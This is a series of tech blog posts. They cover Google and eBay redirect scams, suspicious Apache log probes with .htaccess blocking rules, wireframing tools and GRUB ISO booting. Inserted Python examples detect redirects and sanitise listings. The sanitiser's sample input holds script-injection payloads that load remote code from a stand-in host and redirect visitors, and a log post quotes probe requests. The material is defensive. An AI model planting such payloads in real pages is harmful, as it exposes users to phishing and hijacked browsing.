Tuesday, 28 October 2014

I'm not feeling so lucky - The Google redirect issue

Following up from my post on the Amazon redirect scam, I thought I would show a similar issue with another reputable site, this time Google.

I recently received a spam tweet from a hacked Twitter account. The tweet contained a link to the following page:

https://www.google.com/webhp?client=opera&sourceid=opera#newwindow=1&q=About+us+php+-+Two+Brothers+Auto+Clinic+-+Full+Service+Auto&btnI=3564

This looks like a typical Google search for 'Two Brothers Auto Clinic'. However, if an unsuspecting user were to click on that link, they would be redirected to a spam site pushing Botox and weight-loss treatments.

But how does this work, I hear you cry...

Well, this is not a typical Google query, because it contains 'btnI', which tells Google it is an 'I'm Feeling Lucky' query. Because of this, Google forwards the user straight to the first link in the search results, in this case the auto clinic site. Once the user lands on the compromised site, they are redirected to the spam site with this meta tag:


Somehow, by using a fragment instead of a traditional request parameter, this gets through Google's check on the referrer (which checks that the user has come from the homepage). The likely reason is that a URL fragment is never sent to the server in the initial request; it is read by the homepage's own JavaScript, so the search that follows really does originate from the homepage.
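For anyone filtering links (in a mail gateway, a link scanner or a proxy), the two stages described above can be checked mechanically. The following is an added example written for this post, not code from Google or from the original article: it collects parameters from both the query string and the fragment so that a btnI hidden after the '#' is still seen, and it pulls the target out of a meta refresh tag on the landing page. The sample URL is the one quoted above; the landing-page HTML and the hostnames on the reserved .example TLD are constructed for illustration.

```python
# Added example (not from the original post): spot "I'm Feeling Lucky" links whose
# btnI parameter is hidden in the URL fragment, and find meta-refresh redirects in
# the HTML of the page the user lands on. SAMPLE_URL is the link quoted in the post;
# SAMPLE_LANDING_HTML is constructed for illustration and not taken from any site.
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

SAMPLE_URL = ("https://www.google.com/webhp?client=opera&sourceid=opera"
              "#newwindow=1&q=About+us+php+-+Two+Brothers+Auto+Clinic+-+Full+Service+Auto&btnI=3564")


def classify_lucky_link(url):
    """Describe whether a google.com link will auto-forward to the top search result.

    Parameters are collected from both the query string and the fragment, because
    the fragment is processed client-side and never reaches the server."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    is_google = host == "google.com" or host.endswith(".google.com")
    query_params = parse_qs(parts.query)
    fragment_params = parse_qs(parts.fragment)
    merged = {**query_params, **fragment_params}
    return {
        "feeling_lucky": is_google and "btnI" in merged and "q" in merged,
        "btnI_in_fragment": "btnI" in fragment_params,
        "query": merged.get("q", [""])[0],
    }


# content="N; url=TARGET" as used by <meta http-equiv="refresh">
REFRESH_URL = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)", re.IGNORECASE)


class MetaRefreshFinder(HTMLParser):
    """Collect the targets of every meta refresh tag in a document."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attributes = {name.lower(): (value or "") for name, value in attrs}
        if attributes.get("http-equiv", "").lower() != "refresh":
            return
        match = REFRESH_URL.match(attributes.get("content", ""))
        if match:
            self.targets.append(match.group(1))


def offsite_meta_refresh(html, own_host):
    """Return meta-refresh targets that leave own_host (relative targets stay on-site)."""
    finder = MetaRefreshFinder()
    finder.feed(html)
    finder.close()
    return [t for t in finder.targets
            if (urlsplit(t).hostname or own_host).lower() != own_host.lower()]


# Constructed landing page: a compromised site bouncing the visitor onward.
SAMPLE_LANDING_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=http://spam.example/offer">
<title>About us</title></head><body>...</body></html>"""

if __name__ == "__main__":
    print(classify_lucky_link(SAMPLE_URL))
    print(offsite_meta_refresh(SAMPLE_LANDING_HTML, "autoclinic.example"))
```

A link is only worth flagging when both btnI and q are present on a Google host; a plain search URL, or the same parameters on some other domain, is reported as not feeling lucky. The meta refresh check deliberately ignores relative targets, since a page refreshing to itself or to another path on the same host is normal behaviour.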

This has happened before with other well-known and trusted sites, but it's a first from Google.

Monday, 22 September 2014

The eBay Redirect Scam

I recently found out about yet another security issue eBay has had on their site. This time, the issue is script injection. I've attempted to briefly expose the technical inner workings of this in this post. Here's an example:

When the user clicks on this page, a piece of remote JavaScript is loaded using this:

Which, in turn, loads this script from a Greek site:



I don't know if any of the site owners are innocent, so I've commented them out just in case.

This JavaScript then sends a redirect to another page, which in turn redirects to a site asking for the user's eBay credentials (note the Norton verification seal in the bottom corner):

The login page is a PHP page and seems to change according to the different ads placed on eBay, but they're all focused on phishing eBay credentials.

To resolve this, eBay should stop users from submitting JavaScript in the descriptions of listed products and, as this has actually been around for a while in the form of a Flash app, Flash should also be blocked.
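The fix suggested above is an allow-list on seller-supplied HTML rather than a blacklist of known bad snippets. The following is an added example written for this post, not eBay's code: it keeps harmless formatting tags and attributes, discards script, style, object and iframe elements together with their contents, drops embed tags (the Flash route), strips every on* event handler, and rejects href/src values whose scheme is not http or https after whitespace has been removed (so 'java\nscript:' does not slip past). The sample listing is constructed, with hostnames on the reserved .example TLD.

```python
# Added example (not eBay's code): an allow-list sanitiser for seller-supplied
# listing HTML of the kind the post calls for. Anything that can run code or load
# a plug-in is removed and recorded in an audit trail; harmless formatting stays.
# SAMPLE_LISTING is constructed for illustration.
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li",
                "table", "tr", "td", "th", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
# Elements whose whole content is discarded, not just the tag itself.
CONTENT_DROP = {"script", "style", "object", "iframe", "noscript"}
# Void elements never have a closing tag, so none is emitted for them.
VOID = {"br", "img", "embed", "param"}


def safe_url(value):
    """Accept only absolute http(s) URLs. Whitespace and control characters are
    removed before the scheme check so 'java\\nscript:' cannot hide the scheme."""
    cleaned = "".join(ch for ch in (value or "") if ch > " ")
    return urlsplit(cleaned).scheme.lower() in ("http", "https"), cleaned


class ListingSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside a CONTENT_DROP element
        self.dropped = []     # audit trail of everything removed

    def handle_starttag(self, tag, attrs):
        if tag in CONTENT_DROP:
            self.skip_depth += 1
            self.dropped.append(tag)
            return
        if self.skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)   # the tag goes, its text content is kept
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")   # covers every on* handler
                continue
            if name in URL_ATTRS:
                ok, value = safe_url(value)
                if not ok:
                    self.dropped.append(f"{tag}@{name}={value}")
                    continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in CONTENT_DROP:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))   # text is re-escaped on output


def sanitize_listing(html):
    """Return (clean_html, dropped) for seller-supplied listing markup."""
    parser = ListingSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed listing mixing legitimate formatting with the injection routes
# described in the post: a remote script, an event handler, a javascript: link
# and a Flash embed.
SAMPLE_LISTING = (
    '<p>Genuine <b>Brand</b> phone case</p>'
    '<script src="http://redirector.example/redir.js"></script>'
    '<img src="http://cdn.example/case.jpg" onerror="location=\'http://redirector.example/\'" alt="Case">'
    '<a href="javascript:window.location=\'http://redirector.example\'">Click for deal</a>'
    '<embed src="http://redirector.example/redir.swf" type="application/x-shockwave-flash">'
)

if __name__ == "__main__":
    clean, dropped = sanitize_listing(SAMPLE_LISTING)
    print(clean)
    print(dropped)
```

The audit trail returned alongside the clean HTML is what makes this useful operationally: a listing that repeatedly trips the script or javascript: rules is a signal about the seller account, not just about one page.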

Sunday, 5 January 2014

Darlloz and other weird requests

Yesterday, I was looking at an article detailing a new web app attack named 'Linux.Darlloz'. It exploits a vulnerability in PHP5. Fortunately, I don't use PHP; however, I tailed my Apache logs and found:

141.101.98.185 - - [05/Jan/2014:14:20:18 +0000] "GET /cgi-bin/php HTTP/1.1" 404 509 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

occurring every 10 minutes. This seems to be some sort of botnet with a faked user agent checking whether I'm running PHP. After a few seconds, I received another request:

96.21.81.50 - - [05/Jan/2014:11:25:56 +0000] "\xf4n\x90\xe1\xb5r\xf8\xd0\x1d\x9d\xa7m\x1c\xb6Q\xef\xc4\xad\x97o\xaf\xb4*\x16E\xbd\x89sd\x9b\b\xdck\x0cU\xea$?!q\x84\x90t\xd0#K\xd6\xdb\x02Lv\xd9J\\S\xc4\xa9\x7f\xcaa\x04" 400 310 "-" "-"

I'm not really sure what this is, but I'm guessing it's some sort of payload. My server didn't know how to handle it, so it sent an error.

The final request was:

183.60.48.25 - - [05/Jan/2014:09:29:01 +0000] "GET http://www.baidu.com/ HTTP/1.1" 200 1373 "-" "-"

This is apparently an Apache proxying request (the request line carries a full URL for another host rather than a path on my server). I found that, after repeating the request in a raw session, my server was responding. A lot of people have suggested that this is just an issue with DNS; however, I remained suspicious and followed recommendations to add a rewrite in .htaccess:

# Enable the rewrite engine (the rules below do nothing without it)
RewriteEngine On

# Restrict HTTP methods
RewriteCond %{REQUEST_METHOD} !^(GET|HEAD|OPTIONS|POST)$
RewriteRule .* - [F]

# Block proxy requests (a request line carrying a full http:// URL for another host)
RewriteCond %{THE_REQUEST} ^(GET|HEAD|POST)\ /?http:// [NC]
RewriteCond %{THE_REQUEST} !^(GET|HEAD|POST)\ /?http://(www\.)?yourdomain\.com/
RewriteCond %{THE_REQUEST} !^(GET|HEAD|POST)\ /?http://192\.168\.0\.37/
RewriteRule .* - [F]


I hope this helps anyone who is as worried about rogue requests as I am!
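Rather than reading the log by eye, the three patterns in this post can be picked out automatically from the combined log format. The following is an added example written for this post, not code from the author or from any of the linked articles: it parses Apache combined log lines, allowing for the \xNN escapes Apache writes for unprintable bytes, and labels each request as a PHP-CGI probe, binary garbage, a proxy attempt or normal traffic. The three sample lines are the ones quoted above; the probe pattern is widened to any /cgi-bin/php* name, which is an assumption going beyond the single path seen in this log.

```python
# Added example (not part of the original post): triage of Apache access log
# lines into the patterns the post describes: PHP-CGI probes, binary garbage the
# server could not parse (400), and attempts to use the host as an open proxy.
# SAMPLE_LOG is copied from the post; PHP_CGI_PROBE is a generalisation
# (assumption) covering neighbouring /cgi-bin/php* names, not just /cgi-bin/php.
import re
from collections import Counter

SAMPLE_LOG = r'''141.101.98.185 - - [05/Jan/2014:14:20:18 +0000] "GET /cgi-bin/php HTTP/1.1" 404 509 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"
96.21.81.50 - - [05/Jan/2014:11:25:56 +0000] "\xf4n\x90\xe1\xb5r\xf8\xd0\x1d\x9d\xa7m\x1c\xb6Q\xef\xc4\xad\x97o\xaf\xb4*\x16E\xbd\x89sd\x9b\b\xdck\x0cU\xea$?!q\x84\x90t\xd0#K\xd6\xdb\x02Lv\xd9J\\S\xc4\xa9\x7f\xcaa\x04" 400 310 "-" "-"
183.60.48.25 - - [05/Jan/2014:09:29:01 +0000] "GET http://www.baidu.com/ HTTP/1.1" 200 1373 "-" "-"'''

# Apache "combined" format. Apache writes \xNN for bytes it cannot print and
# escapes quotes and backslashes, so the quoted fields allow backslash escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
HTTP_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH", "CONNECT", "TRACE"}
ESCAPED_BYTE = re.compile(r"\\x[0-9a-fA-F]{2}")
PHP_CGI_PROBE = re.compile(r"^/cgi-bin/php[^/]*$")   # assumption: php, php5, php-cgi, ...


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    match = LOG_RE.match(line.strip())
    if not match:
        return None
    entry = match.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def request_target(request):
    """Return the request-target from 'METHOD target HTTP/x', or None if malformed."""
    tokens = request.split(" ")
    return tokens[1] if len(tokens) == 3 and tokens[0] in HTTP_METHODS else None


def label_request(entry):
    """Classify a parsed entry. Binary checks come first: such requests have no method."""
    request = entry["request"]
    if ESCAPED_BYTE.search(request):
        return "binary-request"
    target = request_target(request)
    if target is None:
        return "malformed-request"
    if re.match(r"^https?://", target, re.IGNORECASE):
        return "proxy-attempt"          # absolute URI: client wants us to fetch another host
    if PHP_CGI_PROBE.match(target.split("?")[0]):
        return "php-cgi-probe"
    return "normal"


def triage(log_text):
    """Return one dict per parsable line with ip, status, target and label."""
    results = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        results.append({"ip": entry["ip"], "status": entry["status"],
                        "target": request_target(entry["request"]),
                        "label": label_request(entry)})
    return results


def label_counts(results):
    """Tally of labels, handy for spotting the 'every 10 minutes' style of probe."""
    return Counter(r["label"] for r in results)


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for row in found:
        print(row)
    print(label_counts(found))
```

Running this over a whole day's log and grouping the php-cgi-probe rows by source address reproduces the "every 10 minutes" observation from the post as a count rather than an impression, and any proxy-attempt rows with a 200 status are the ones worth worrying about, since they mean the server actually served the forwarded request.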

Update

I've done a bit more research and apparently this attack is part of the ZmEu scanner. You can learn more here: http://ensourced.wordpress.com/2011/02/25/zmeu-attacks-some-basic-forensic/

Thursday, 24 October 2013

Wireframing

As a guy who is incapable of producing decent designs and plans, I've looked around for the best wireframing solutions. I've compiled the list below:

Wireframe.cc

Wireframe.cc is great, although exporting is not allowed in the free version and there is branding scattered all over the site. The prices are reasonably low (around £10 a month for a single user), and the toolkit is impressive, containing features such as version control to help organise your designs!

mockflow.com

Mockflow has the largest set of mock-up features for your site, and themes to help you get started. However, disappointingly, you are restricted to one project only. The fully paid version costs a lot (around £42 a month); however, if you are a freelance or professional developer, this might suit you. The collaboration features are also a step above the rest.

moqups.com

Moqups is a reasonably new contender, but the interface is easy to use and contains all the features needed to generate a reasonable wireframe. Moqups is also extremely well priced (for 10 projects, it is around £5 or $9, and there is a free version available too).

gomockingbird.com

If you are looking to generate superior wireframes, then look no further. Mockingbird, from what I can see, is intended for use by site developers and not by enthusiasts. It contains a surprising number of elements and supports excellent collaboration. There are many plans (all starting around $9); however, the free version comes with one site and 10 pages, which is enough to get started with!

uxpin.com

UXPin is built from the ground up for multiple platforms. It is probably the most well-known service and has had a good reputation for a while now. There is no real free edition (only a 7-day free trial), and it costs $14.99 per month. I have used this for certain projects before and I've not found any issues.


I've only managed to give a very basic insight into the tools available (others include Balsamiq and HotGloo); however, if there are any that you think I should consider, please leave a comment below.

Monday, 8 April 2013

GRUB2 ISO Boot

A new feature in GRUB 2 is the ability to boot raw ISO files, and it is surprisingly simple.

Before continuing with this tutorial, please backup your files. I do not accept any liability for damage to systems.

  1. Download an ISO image of your favorite distribution (I'm using Ubuntu 12.10; others may need a different configuration). 64-bit images also require a different configuration.
  2. Move the ISO image to the /boot directory of your system (this requires root privileges, so use sudo mv).
  3. As root, edit /boot/grub/grub.cfg. Change the isofile variable and paste the following below the line ### END /etc/grub.d/10_linux_proxy ###. Note that grub.cfg is regenerated whenever update-grub runs (for example after a kernel update), so a hand-edited entry will need to be re-added afterwards:

menuentry "Ubuntu ISO" {
        # Path to the ISO, relative to the root of the partition named below
        set isofile="/boot/ubuntu-12.10-desktop-i386.iso"
        # (hd1,5) is the partition holding the ISO; adjust to match your disk layout
        loopback loop (hd1,5)$isofile
        # Boot the live kernel from inside the ISO; casper finds the ISO via iso-scan/filename
        linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=$isofile noprompt noeject
        initrd (loop)/casper/initrd.lz
}

That's it. Save, exit and reboot, then choose Ubuntu ISO in the GRUB menu. If you run into any problems, use a live CD to mount the GRUB partition and edit the file by hand.